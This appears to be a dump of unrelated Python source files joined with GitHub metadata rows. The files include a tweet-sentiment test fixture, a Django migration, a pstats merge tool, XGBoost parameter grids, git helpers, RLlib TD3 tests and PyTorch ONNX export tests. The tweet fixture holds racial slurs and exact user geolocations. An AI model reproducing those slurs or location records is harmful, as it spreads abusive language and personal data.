['"@CarmenMaree: When u stop believing in me it doesn\'t discourage me it encourages me. Chess not checkers">no chess only checkers king me lol', datetime.datetime(2011, 9, 1, 7, 30, 26), 37.3508968, -121.9155979, ['carmenmaree', 'when', 'u', 'stop', 'believing', 'in', 'me', 'it', 'doesn', 't', 'discourage', 'me', 'it', 'encourages', 'me', 'chess', 'not', 'checkers', 'gt', 'no', 'chess', 'only', 'checkers', 'king', 'me', 'lol'], -0.4375],
['Cabdrivers playing chess on Lankershim http://t.co/VKmMBr1', datetime.datetime(2011, 9, 1, 10, 37, 35), 34.16588, -118.363726, ['cabdrivers', 'playing', 'chess', 'on', 'lankershim', 'http', 't', 'co', 'vkmmbr'], None],
['Chess really can make hisself sound like he from New Orleans.', datetime.datetime(2011, 9, 1, 16, 42, 16), 32.29965037, -90.21041482, ['chess', 'really', 'can', 'make', 'hisself', 'sound', 'like', 'he', 'from', 'new', 'orleans'], 0.4],
['Playing chess....sit back and watch', datetime.datetime(2011, 9, 1, 18, 10, 16), 29.99374808, -95.48194177, ['playing', 'chess', 'sit', 'back', 'and', 'watch'], 0.375],
['I feel like a pilgrim playing chess on my laptop.', datetime.datetime(2011, 8, 29, 1, 39, 45), 42.2434638, -71.8070041, ['i', 'feel', 'like', 'a', 'pilgrim', 'playing', 'chess', 'on', 'my', 'laptop'], -0.25],
['Playing chess with @teachu2swag91 #intelligenceiskey', datetime.datetime(2011, 9, 1, 20, 31, 17), 39.19055013, -96.58069392, ['playing', 'chess', 'with', 'teachu', 'swag', 'intelligenceiskey'], None],
["Kept pieces in great shape; never wanted to play them. RT @amhistorymuseum: Gen. McClellan's chess set: http://t.co/aNqMiN9 #CivilWar", datetime.datetime(2011, 9, 1, 22, 5, 7), 35.54968891, -79.19119128, ['kept', 'pieces', 'in', 'great', 'shape', 'never', 'wanted', 'to', 'play', 'them', 'rt', 'amhistorymuseum', 'gen', 'mcclellan', 's', 'chess', 'set', 'http', 't', 'co', 'anqmin', 'civilwar'], -0.03125],
['Good games of chess to have a que (@ Woodruff Park Chess Court) [pic]: http://t.co/1J38OHb', datetime.datetime(2011, 9, 1, 22, 30, 53), 33.75497282, -84.38881874, ['good', 'games', 'of', 'chess', 'to', 'have', 'a', 'que', 'woodruff', 'park', 'chess', 'court', 'pic', 'http', 't', 'co', 'j', 'ohb'], 0.4583333333333333],
['Love is like chess: one false move and your mated!', datetime.datetime(2011, 9, 2, 12, 18, 8), 39.67314645, -75.5933131, ['love', 'is', 'like', 'chess', 'one', 'false', 'move', 'and', 'your', 'mated'], -0.075],
['Life is like chess watch out for the thiefs...', datetime.datetime(2011, 8, 29, 2, 15, 9), 40.73606891, -73.8822584, ['life', 'is', 'like', 'chess', 'watch', 'out', 'for', 'the', 'thiefs'], -0.5],
["I've been really good busy with chess games...", datetime.datetime(2011, 8, 29, 2, 41, 54), 40.73605699, -73.88223831, ['i', 've', 'been', 'really', 'good', 'busy', 'with', 'chess', 'games'], 0.40625],
['I kind of miss playing chess!', datetime.datetime(2011, 8, 29, 3, 57, 29), 25.846725, -80.2089483, ['i', 'kind', 'of', 'miss', 'playing', 'chess'], 0.041666666666666664],
['This A Game Of Chess You Niggas Think Its Clevage Smh', datetime.datetime(2011, 8, 29, 5, 19, 44), 41.889577, -87.7166733, ['this', 'a', 'game', 'of', 'chess', 'you', 'niggas', 'think', 'its', 'clevage', 'smh'], -0.5],
['I got chess pains', datetime.datetime(2011, 8, 29, 7, 21, 52), 40.59106637, -73.95400384, ['i', 'got', 'chess', 'pains'], -0.25],
["@MickeyFactz yo what up with the All City Chess Club man? I need a mixtape from y'all BADLY!", datetime.datetime(2011, 9, 2, 15, 57, 43), 40.8890272, -73.86439015, ['mickeyfactz', 'yo', 'what', 'up', 'with', 'the', 'all', 'city', 'chess', 'club', 'man', 'i', 'need', 'a', 'mixtape', 'from', 'y', 'all', 'badly'], 0.125],
["checkmate RT @MarkusAMaximus: @AssHoleGabe I didn't know you were into chess.", datetime.datetime(2011, 9, 8, 17, 17, 59), 32.60908591, -114.70923197, ['checkmate', 'rt', 'markusamaximus', 'assholegabe', 'i', 'didn', 't', 'know', 'you', 'were', 'into', 'chess'], 0.2916666666666667],
['@booda0329 lol yeah he deserves to get his chess caved in 2day', datetime.datetime(2011, 9, 8, 18, 17, 21), 39.74443149, -75.52001935, ['booda', 'lol', 'yeah', 'he', 'deserves', 'to', 'get', 'his', 'chess', 'caved', 'in', 'day'], None],
["I'm at Panda Express (2011 Chess Dr., Bridgepointe Pkwy., San Mateo) http://t.co/ptyARBn", datetime.datetime(2011, 9, 8, 18, 38, 57), 37.562765, -122.280813, ['i', 'm', 'at', 'panda', 'express', 'chess', 'dr', 'bridgepointe', 'pkwy', 'san', 'mateo', 'http', 't', 'co', 'ptyarbn'], -0.375],
["@Eminem @ItsBadMeetsEvil Can't tell the difference.preference is on the challenge. Chess is a game of quiet minds.", datetime.datetime(2011, 9, 8, 19, 0, 19), 28.00071117, -82.54994606, ['eminem', 'itsbadmeetsevil', 'can', 't', 'tell', 'the', 'difference', 'preference', 'is', 'on', 'the', 'challenge', 'chess', 'is', 'a', 'game', 'of', 'quiet', 'minds'], -0.25],
['@XSTROLOGY: #Cancer women R the best players of romantic chess. She knw exactly hw to make a man desperately fall in love with her. THATS ME', datetime.datetime(2011, 9, 8, 21, 55, 11), 35.013108, -90.058008, ['xstrology', 'cancer', 'women', 'r', 'the', 'best', 'players', 'of', 'romantic', 'chess', 'she', 'knw', 'exactly', 'hw', 'to', 'make', 'a', 'man', 'desperately', 'fall', 'in', 'love', 'with', 'her', 'thats', 'me'], 0.53125],
['These n*ggas in here playing chess! Instead of cuttin hair \ue416', datetime.datetime(2011, 9, 8, 22, 16, 10), 33.21861974, -97.12732133, ['these', 'n', 'ggas', 'in', 'here', 'playing', 'chess', 'instead', 'of', 'cuttin', 'hair'], None],
['Мы с Катей Лагно:)) @ World Chess Hall of Fame http://t.co/EvL1cLA', datetime.datetime(2011, 9, 9, 0, 21, 29), 38.644756, -90.261281, ['world', 'chess', 'hall', 'of', 'fame', 'http', 't', 'co', 'evl', 'cla'], -0.375],
['Только что открыли Музей Шахматной Славы:) (@ World Chess Hall of Fame w/ 4 others) [pic]: http://t.co/kLfMIga', datetime.datetime(2011, 9, 9, 0, 26, 25), 38.644756, -90.261281, ['world', 'chess', 'hall', 'of', 'fame', 'w', 'others', 'pic', 'http', 't', 'co', 'klfmiga'], -0.375],
['GGs skool has 50 iPads her words - "isn\'t skool amazing" the get to play #chessw/friends in the chess club! #MSA rocks!', datetime.datetime(2011, 9, 9, 0, 32, 21), 41.79600115, -87.60432008, ['ggs', 'skool', 'has', 'ipads', 'her', 'words', 'isn', 't', 'skool', 'amazing', 'the', 'get', 'to', 'play', 'chessw', 'friends', 'in', 'the', 'chess', 'club', 'msa', 'rocks'], 0.25],
["I'm at Checkmate Chess Supply (Cary) http://t.co/ZtjuExj", datetime.datetime(2011, 9, 9, 0, 38, 10), 42.228951, -88.246605, ['i', 'm', 'at', 'checkmate', 'chess', 'supply', 'cary', 'http', 't', 'co', 'ztjuexj'], 0.125],
['I wonder if this is the kind of chess @neiltyson plays...? #grail #nasatweetup @ Kennedy Space Center http://t.co/gMGJXgC', datetime.datetime(2011, 9, 9, 1, 14, 58), 28.34326, -80.61127, ['i', 'wonder', 'if', 'this', 'is', 'the', 'kind', 'of', 'chess', 'neiltyson', 'plays', 'grail', 'nasatweetup', 'kennedy', 'space', 'center', 'http', 't', 'co', 'gmgjxgc'], 0.375],
['"@babycuzimmanerd: Know when u get that bad feeling in your chest?...Hmmm..." "I gotta pain in my chess an its hard to breav" u all good??', datetime.datetime(2011, 9, 9, 1, 32, 22), 41.53072809, -87.64389299, ['babycuzimmanerd', 'know', 'when', 'u', 'get', 'that', 'bad', 'feeling', 'in', 'your', 'chest', 'hmmm', 'i', 'gotta', 'pain', 'in', 'my', 'chess', 'an', 'its', 'hard', 'to', 'breav', 'u', 'all', 'good'], -0.05357142857142857],
['I lived in ur chess game but u changed the rules everyday', datetime.datetime(2011, 9, 9, 4, 29, 38), 31.17176022, -84.73426302, ['i', 'lived', 'in', 'ur', 'chess', 'game', 'but', 'u', 'changed', 'the', 'rules', 'everyday'], -0.16666666666666666],
["I'm at Willie Dixon's Blues Heaven Foundation (Historic Site of Chess Records) (2120 S. Michigan Ave., Chicago) http://t.co/euDdzlL", datetime.datetime(2011, 9, 9, 5, 31, 12), 41.853589, -87.624231, ['i', 'm', 'at', 'willie', 'dixon', 's', 'blues', 'heaven', 'foundation', 'historic', 'site', 'of', 'chess', 'records', 's', 'michigan', 'ave', 'chicago', 'http', 't', 'co', 'euddzll'], -0.25],
['Chess pieces. @ J.V. Bailey House http://t.co/pHNGFOE', datetime.datetime(2011, 9, 2, 20, 26, 13), 44.97925186, -93.16854095, ['chess', 'pieces', 'j', 'v', 'bailey', 'house', 'http', 't', 'co', 'phngfoe'], None],
['Playin chess to clear the mind', datetime.datetime(2011, 9, 2, 20, 50, 41), 38.9970325, -77.0356301, ['playin', 'chess', 'to', 'clear', 'the', 'mind'], 0.0],
['@MrSteveMatchett keep us posted on your chess results.', datetime.datetime(2011, 9, 2, 21, 19, 23), 40.10979198, -76.28119058, ['mrstevematchett', 'keep', 'us', 'posted', 'on', 'your', 'chess', 'results'], None],
['#microstock sales nice and steady on @Dreamstime chess players unite for this one! Haha http://t.co/gMzRKjW', datetime.datetime(2011, 9, 2, 21, 44, 12), 33.875078, -118.126954, ['microstock', 'sales', 'nice', 'and', 'steady', 'on', 'dreamstime', 'chess', 'players', 'unite', 'for', 'this', 'one', 'haha', 'http', 't', 'co', 'gmzrkjw'], 0.041666666666666664],
['@ZachAllStar chilli chess fries lol', datetime.datetime(2011, 9, 3, 0, 7, 41), 29.6627393, -95.47601923, ['zachallstar', 'chilli', 'chess', 'fries', 'lol'], None],
['Tryna make moves like a game of chess.', datetime.datetime(2011, 9, 3, 2, 55, 21), 40.01188117, -75.18427591, ['tryna', 'make', 'moves', 'like', 'a', 'game', 'of', 'chess'], -0.08333333333333333],
["Man life is life girl don't play me like chess peices", datetime.datetime(2011, 9, 3, 4, 0, 44), 32.85489302, -96.66359502, ['man', 'life', 'is', 'life', 'girl', 'don', 't', 'play', 'me', 'like', 'chess', 'peices'], -0.25],
["1234 5678", datetime.datetime(2011, 9, 3, 4, 0, 45), 33.85489302, -93.66359502, [], None],
["cheapjack", datetime.datetime(2011, 9, 3, 4, 0, 46), 33.85489302, -94.66359502, ['cheapjack'], -1.0],
["excellent", datetime.datetime(2011, 9, 3, 4, 0, 47), 33.85489302, -95.66359502, ['excellent'], 1.0],
["excellent cheapjack", datetime.datetime(2011, 9, 3, 4, 0, 48), 33.85489302, -96.66359502, ['excellent', 'cheapjack'], 0.0],
]
word_sentiments = load_sentiments()
tweettext = [('Tweet',args[:4],{'_outputtest':'get_text'},args[0]) for args in tweetlist]
tweettime = [('Tweet',args[:4],{'_outputtest':'get_time'},args[1]) for args in tweetlist]
tweetloc = [('Tweet',args[:4],{'_outputtest':'get_location'},Position(*args[2:4])) for args in tweetlist]
tweetwords = [('Tweet',args[:4],{'_outputtest':'get_words'},args[4]) for args in tweetlist]
tweetesent = [('Tweet',args[:4],{'_outputtest':'get_sentiment','_outputargs':[{}]},None) for args in tweetlist]
tweetsent = [('Tweet',args[:4],{'_outputtest':'get_sentiment','_outputargs':[word_sentiments]},args[5]) for args in tweetlist]
tweetmult = [(args1[0], (args1[1],args2[1],args3[1],args4[1]), args1[2], [args1[3],args2[3],args3[3],args4[3]]) for args1,args2,args3,args4 in zip(*[it.chain(tweettext,tweettime,tweetloc,tweetwords,tweetesent)]*4)]
def makedict(l):
return {name:eval(name) for name in l}
tset = makedict(["tweettext","tweettime","tweetloc","tweetwords","tweetsent","tweetesent",
])
jset = makedict(["tweetmult"
])
| [
"noreply@github.com"
] | borgr.noreply@github.com |
5aac4802175c9e01e52b360b66fd915af1002463 | e17680647cbaee4d2661246eac1357d7f1de1536 | /apps/organization/migrations/0004_auto_20180519_1313.py | bd9fef39819fa3e7e26363ba7b8ccf81ebee32c0 | [] | no_license | chenjb04/LearnOnline | 0cad4da6917121e889ce03928acd06f0e72313fc | 35dadcc73e3a803ca7756a51bbcc3e408912ab12 | refs/heads/master | 2020-04-26T17:21:43.360876 | 2019-05-06T08:18:43 | 2019-05-06T08:18:43 | 173,710,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | # Generated by Django 2.0.5 on 2018-05-19 13:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('organization', '0003_courseorg_catgory'),
]
operations = [
migrations.RenameField(
model_name='courseorg',
old_name='catgory',
new_name='category',
),
]
| [
"chenjb04@163.com"
] | chenjb04@163.com |
21d3203a342aae2ceed8f3725d137594722bd3ba | 41efe260c251c719f87e883cc97f3c796569c5ce | /deving/pstats_merge.py | 16347e4301e36cb3b64c3fd8be4318a421ce91cc | [] | no_license | orenovadia/deving | f49c4bb7a354d420644afc87c87c163f95ad4987 | 6b18347e43a556599593ec5f09248945966167de | refs/heads/master | 2020-03-10T07:10:47.326670 | 2019-02-10T23:21:18 | 2019-02-10T23:21:18 | 129,256,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | from __future__ import print_function
import pstats
import click
@click.command(name='pstats_merge')
@click.argument(
'from_files',
type=click.Path(exists=True, file_okay=True, dir_okay=False, resolve_path=False),
required=True,
nargs=-1
)
@click.argument(
'to_file',
type=click.Path(exists=False, file_okay=True, dir_okay=False, resolve_path=False),
required=True
)
def pstats_merge(from_files, to_file):
"""
Merges multiple pstat files to one
Using: https://docs.python.org/2/library/profile.html
"""
p = pstats.Stats(*from_files)
p.dump_stats(to_file)
if __name__ == '__main__':
pstats_merge()
| [
"orenovad@gmail.com"
] | orenovad@gmail.com |
bfc3d935394fc6ca878f5a81da542c5dea036d5d | 82d6e248d6498f53455f9ccb40b6ff9667da8f2e | /Params/xgb_cv_params.py | 46a7ba704b2ce3ce71ca634f5f5c6062b486bd36 | [] | no_license | marvinxu-free/data_analysis | 650ddf35443e66c395c8c503cacc328e547298a5 | 7a552959fd6272a54488c59091fa8b820c3f19ce | refs/heads/master | 2020-03-22T04:00:09.938423 | 2018-07-02T16:32:20 | 2018-07-02T16:32:20 | 139,466,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,577 | py | # -*- coding: utf-8 -*-
# Project: local-spark
# Author: chaoxu create this file
# Time: 2017/10/13
# Company : Maxent
# Email: chao.xu@maxent-inc.com
from __future__ import print_function, division
xgb_base_params = {
'objective': 'binary:logistic',
# 'objective' : 'binary:logitraw',
'nthread': -1,
# 'scale_pos_weight':scale_ios_ratio,
# 'missing':-6.666,
'seed': 42
}
xgb_test_params = {
'learning_rate': [0.05, 0.1, 0.5],
'n_estimators': range(10, 200, 10),
'max_depth': range(3, 10, 2),
'min_child_weight': range(1, 6, 2),
'gamma': [i / 10.0 for i in range(0, 5)],
'subsample': [i / 10.0 for i in range(6, 10)],
'colsample_bytree': [i / 10.0 for i in range(6, 10)],
'reg_alpha': [0, 0.001, 0.005, 0.01, 0.05],
}
xgb_qiaoda_params = {
'learning_rate': [i / 10.0 for i in range(1, 10)],
'n_estimators': range(1, 20, 1),
'max_depth': range(3, 10, 1),
'min_child_weight': range(1, 10, 1),
'gamma': [i / 10.0 for i in range(1, 10)],
'subsample': [i / 10.0 for i in range(1, 10)],
'colsample_bytree': [i / 10.0 for i in range(1, 10)],
'reg_alpha': [i / 10.0 for i in range(1, 10)],
}
xgb_jd_params = {
'learning_rate': [i / 10.0 for i in range(1, 10)],
'n_estimators': range(1, 20, 1),
'max_depth': range(1, 6, 1),
'min_child_weight': range(1, 10, 1),
'gamma': [i / 10.0 for i in range(1, 5)],
'subsample': [i / 10.0 for i in range(1, 5)],
'colsample_bytree': [i / 10.0 for i in range(1, 5)],
'reg_alpha': [i / 10.0 for i in range(1, 5)],
}
| [
"marvinxu_free@163.com"
] | marvinxu_free@163.com |
d0023e8273cd6e97b2ad2bfdf9a6782d33bfc3e3 | bb109bd629c67a30a57850ebc97f9a9625aa998f | /wmtexe/cmi/git.py | 748d4b4a734ecdbb8b4082128123fa2889aa607b | [
"MIT"
] | permissive | csdms/wmt-exe | b0966f27792be853e8469f12a7e78aea24da6bfa | 9f6e5a20e65765389682161b985cab186db88fce | refs/heads/master | 2022-11-15T06:27:23.589160 | 2022-10-25T23:57:21 | 2022-10-25T23:57:21 | 22,662,428 | 0 | 2 | MIT | 2022-10-25T23:57:22 | 2014-08-05T23:04:09 | Python | UTF-8 | Python | false | false | 1,616 | py | #! /usr/bin/env python
import os
from .utils import which, check_output, system, cd, status
def git_repo_name(url):
(base, _) = os.path.splitext(os.path.basename(url))
return base
def git_repo_sha(url, git=None, branch='master'):
git = git or which('git')
lines = check_output([git, 'ls-remote', url]).strip().split(os.linesep)
shas = dict()
for line in lines:
(sha, name) = line.split()
shas[name] = sha
return shas['refs/heads/{branch}'.format(branch=branch)][:10]
def git_clone(url, git=None, dir='.', branch='master'):
git = git or which('git')
with cd(dir):
system([git, 'init', '-q'])
system([git, 'config', 'remote.origin.url', url])
system([git, 'config', 'remote.origin.fetch',
'+refs/heads/*:refs/remotes/origin/*'])
system([git, 'fetch', 'origin',
'{branch}:refs/remotes/origin/{branch}'.format(branch=branch),
'-n', '--depth=1'])
system([git, 'reset', '--hard',
'origin/{branch}'.format(branch=branch)])
def git_pull(url, dir='.', branch='master'):
with cd(dir):
system(['git', 'checkout', '-q', branch])
system(['git', 'pull', 'origin', '-q',
'refs/heads/{branch}:refs/remotes/origin/{branch}'.format(branch=branch)])
def git_clone_or_update(url, dir='.', branch='master'):
if os.path.isdir(os.path.join(dir, '.git')):
status('Updating %s' % url)
git_pull(url, dir=dir, branch=branch)
else:
status('Cloning %s' % url)
git_clone(url, dir=dir, branch=branch)
| [
"mcflugen@gmail.com"
] | mcflugen@gmail.com |
8f5359219eca321f19a6e87ffc21568d1cd514cd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02422/s434334605.py | 0f8d8509dfbc38c56d306e2d546cad7fb3863b38 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | S = input()
n = int(input())
for i in range(n):
q = input().split()
q[1] = int(q[1])
q[2] = int(q[2])
if q[0] == "print":
print(S[q[1]:q[2] + 1])
elif q[0] == "reverse":
if q[1] == 0:
S = S[:q[1]] + S[q[2]::-1] + S[q[2] + 1:]
else:
S = S[:q[1]] + S[q[2]:q[1] - 1:-1] + S[q[2] + 1:]
elif q[0] == "replace":
S = S[:q[1]] + q[3] + S[q[2] + 1:] | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
fdd3bcccc3ab81cc1c4dd4ecddb857fc92b52c6c | 8f24e443e42315a81028b648e753c50967c51c78 | /rllib/algorithms/td3/tests/test_td3.py | 977c91fea4939895fe9cb6997559ab256cd0dcd1 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | simon-mo/ray | d07efdada8d05c6e10417f96e8dfc35f9ad33397 | 1e42e6cd15e2fb96c217cba8484e59ed0ef4b0c8 | refs/heads/master | 2023-03-06T00:09:35.758834 | 2022-12-23T18:46:48 | 2022-12-23T18:46:48 | 122,156,396 | 4 | 2 | Apache-2.0 | 2023-03-04T08:56:56 | 2018-02-20T04:47:06 | Python | UTF-8 | Python | false | false | 4,032 | py | import numpy as np
import unittest
import ray
import ray.rllib.algorithms.td3 as td3
from ray.rllib.utils.framework import try_import_tf
from ray.rllib.utils.test_utils import (
check,
check_compute_single_action,
check_train_results,
framework_iterator,
)
tf1, tf, tfv = try_import_tf()
class TestTD3(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
ray.init()
@classmethod
def tearDownClass(cls) -> None:
ray.shutdown()
def test_td3_compilation(self):
"""Test whether TD3 can be built with both frameworks."""
config = td3.TD3Config()
# Test against all frameworks.
for _ in framework_iterator(config, with_eager_tracing=True):
algo = config.build(env="Pendulum-v1")
num_iterations = 1
for i in range(num_iterations):
results = algo.train()
check_train_results(results)
print(results)
check_compute_single_action(algo)
algo.stop()
def test_td3_exploration_and_with_random_prerun(self):
"""Tests TD3's Exploration (w/ random actions for n timesteps)."""
config = td3.TD3Config().environment(env="Pendulum-v1")
no_random_init = config.exploration_config.copy()
random_init = {
# Act randomly at beginning ...
"random_timesteps": 30,
# Then act very closely to deterministic actions thereafter.
"stddev": 0.001,
"initial_scale": 0.001,
"final_scale": 0.001,
}
obs = np.array([0.0, 0.1, -0.1])
# Test against all frameworks.
for _ in framework_iterator(config, with_eager_tracing=True):
config.exploration(exploration_config=no_random_init)
# Default GaussianNoise setup.
algo = config.build()
# Setting explore=False should always return the same action.
a_ = algo.compute_single_action(obs, explore=False)
check(algo.get_policy().global_timestep, 1)
for i in range(50):
a = algo.compute_single_action(obs, explore=False)
check(algo.get_policy().global_timestep, i + 2)
check(a, a_)
# explore=None (default: explore) should return different actions.
actions = []
for i in range(50):
actions.append(algo.compute_single_action(obs))
check(algo.get_policy().global_timestep, i + 52)
check(np.std(actions), 0.0, false=True)
algo.stop()
# Check randomness at beginning.
config.exploration(exploration_config=random_init)
algo = config.build()
# ts=0 (get a deterministic action as per explore=False).
deterministic_action = algo.compute_single_action(obs, explore=False)
check(algo.get_policy().global_timestep, 1)
# ts=1-29 (in random window).
random_a = []
for i in range(1, 30):
random_a.append(algo.compute_single_action(obs, explore=True))
check(algo.get_policy().global_timestep, i + 1)
check(random_a[-1], deterministic_action, false=True)
self.assertTrue(np.std(random_a) > 0.3)
# ts > 30 (a=deterministic_action + scale * N[0,1])
for i in range(50):
a = algo.compute_single_action(obs, explore=True)
check(algo.get_policy().global_timestep, i + 31)
check(a, deterministic_action, rtol=0.1)
# ts >> 30 (BUT: explore=False -> expect deterministic action).
for i in range(50):
a = algo.compute_single_action(obs, explore=False)
check(algo.get_policy().global_timestep, i + 81)
check(a, deterministic_action)
algo.stop()
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
| [
"noreply@github.com"
] | simon-mo.noreply@github.com |
b8d5ded851da55920148133d10f0002e5942859e | 67db5c946b11bcc3cb6cef074ab6b6b9d0a72961 | /test/onnx/test_utility_funs.py | 0c1d8d3b2208639c42d531c4bdae58356f2065b2 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | dusty-nv/pytorch | 951c570c8c52ffb839275dfe5956a814ff556e5e | d0c925f1c73d6015122e71c8c59cbf1af3f06250 | refs/heads/master | 2022-05-26T15:18:39.557017 | 2020-04-16T16:01:05 | 2020-04-16T16:03:17 | 256,265,482 | 2 | 0 | NOASSERTION | 2020-04-16T16:09:26 | 2020-04-16T16:09:26 | null | UTF-8 | Python | false | false | 26,624 | py | from __future__ import absolute_import, division, print_function, unicode_literals
from test_pytorch_common import TestCase, run_tests
import torch
import torch.onnx
from torch.onnx import utils, OperatorExportTypes
from torch.onnx.symbolic_helper import _set_opset_version, _set_operator_export_type
from test_pytorch_common import skipIfUnsupportedOpsetVersion
import onnx
import onnxruntime # noqa
import numpy as np
import io
import copy
import unittest
skip = unittest.skip
class TestUtilityFuns(TestCase):
opset_version = 9
def setUp(self):
torch.manual_seed(0)
if torch.cuda.is_available():
torch.cuda.manual_seed_all(0)
def test_is_in_onnx_export(self):
test_self = self
class MyModule(torch.nn.Module):
def forward(self, x):
test_self.assertTrue(torch.onnx.is_in_onnx_export())
raise ValueError
return x + 1
x = torch.randn(3, 4)
f = io.BytesIO()
try:
torch.onnx.export(MyModule(), x, f, opset_version=self.opset_version)
except ValueError:
self.assertFalse(torch.onnx.is_in_onnx_export())
def test_validate_dynamic_axes_invalid_input_output_name(self):
import warnings
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
utils._validate_dynamic_axes({'input1': {}, 'output': {},
'invalid_name1': {}, 'invalid_name2': {}},
None, ['input1', 'input2'], ['output'])
messages = [str(warning.message) for warning in w]
assert "Provided key invalid_name1 for dynamic axes is not a valid input/output name" in messages
assert "Provided key invalid_name2 for dynamic axes is not a valid input/output name" in messages
assert len(messages) == 2
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_transpose(self):
class TransposeModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.transpose(a, 1, 0)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(3, 2)
graph, _, __ = utils._model_to_graph(TransposeModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Transpose"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
def test_constant_fold_reduceL2(self):
class TransposeModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.norm(a, p=2, dim=-2, keepdim=False)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(2, 3)
graph, _, __ = utils._model_to_graph(TransposeModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::ReduceL2"
assert len(list(graph.nodes())) == 1
def test_constant_fold_reduceL1(self):
class NormModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.norm(a, p=1, dim=-2)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(2, 3)
graph, _, __ = utils._model_to_graph(NormModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::ReduceL1"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_slice(self):
class NarrowModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.narrow(a, 0, 0, 1)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(1, 3)
graph, _, __ = utils._model_to_graph(NarrowModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Slice"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_slice_index_exceeds_dim(self):
class SliceIndexExceedsDimModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = a[1:10] # index exceeds dimension
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(1, 3)
graph, _, __ = utils._model_to_graph(SliceIndexExceedsDimModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Slice"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_slice_negative_index(self):
class SliceNegativeIndexModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = a[0:-1] # index relative to the end
c = torch.select(a, dim=-1, index=-2)
d = torch.select(a, dim=1, index=0)
return b + x, c + d
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(1, 3)
graph, _, __ = utils._model_to_graph(SliceNegativeIndexModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Slice"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
def test_constant_fold_gather(self):
class GatherModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.select(a, dim=1, index=-2)
c = torch.index_select(a, dim=-2, index=torch.tensor([0, 1]))
return b + 1, c + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(1, 3)
model = GatherModule()
model(x)
graph, _, __ = utils._model_to_graph(GatherModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Gather"
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_unsqueeze(self):
class UnsqueezeModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.unsqueeze(a, 0)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
